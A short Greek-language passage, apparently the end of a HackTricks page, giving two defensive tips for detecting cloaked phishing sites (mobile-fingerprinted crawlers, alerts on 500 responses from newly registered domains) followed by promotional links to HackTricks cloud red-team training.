  • Εκτελέστε crawlers με αποτυπώματα παρόμοια με κινητές συσκευές και με ενεργοποιημένο JS για να αποκαλύψετε περιορισμένο περιεχόμενο.
  • Ειδοποιήστε για ύποπτες απαντήσεις 500 μετά από POST /detect σε πρόσφατα εγγεγραμμένα domains.

Αναφορές

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks